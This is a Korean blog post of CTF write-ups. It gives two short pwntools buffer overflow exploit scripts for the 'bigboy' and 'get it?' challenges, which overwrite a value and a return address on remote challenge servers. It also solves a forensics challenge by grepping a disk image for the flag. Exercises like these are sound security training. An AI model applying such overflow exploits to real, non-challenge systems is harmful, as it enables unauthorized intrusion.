반응형
매우매우 간단한 문제들쓰
system
bigboy
매우매우 간단한 bof 문제
/*exploit code*/
from pwn import *
r = remote('pwn.chal.csaw.io' ,9000)
#r = process("./boi")
context.log_level = 'debug'
r.recvline()
a = "A" * 0x14
a += p64(0xcaf3baee)
r.sendline(a)
r.interactive()
get it?
여윽시 매우매우 간단한 bof
/*exploit code*/
from pwn import *
#r = process("./get_it")
r = remote("pwn.chal.csaw.io", 9001)
context.log_level = 'debug'
r.recvline()
a = "A" * 0x28
a += p64(0x004005B6)
r.send(a)
r.interactive()
Forensic
rewind
문제 설명은 다음과 같다.
문제 파일을 다운로드 받아 file 명령어로 살펴보면, 다음과 같이 data 와 QEMU disk image 파일인 것을 확인할 수 있다.
> strings rewind-rr-snp | grep "flag{"
혹은
> grep -a "flag{.*}" rewind-rr-snp
명령어로 박혀있는 플래그를 읽어올 수 있다.
image 파일에 보통 flag가 하드코딩되어 있는 경우가 있긴하던데 이 문제도 그럴줄은 몰랐다..
simple_recovery
주어진 파일 속에 존재하는 disk.img0 는...
...음
반응형
'Write-up' 카테고리의 다른 글
[InCTF 2018] Magical Radio writeup (0) | 2018.10.20 |
---|---|
[InCTF 2018] writeup (0) | 2018.10.16 |
[SECURITYFEST 2018] sshnuke writeup (0) | 2018.06.03 |
[SECURITYFEST 2018] zion writeup (0) | 2018.06.03 |
[SECURITYFEST 2018] Mr.reagan (0) | 2018.06.03 |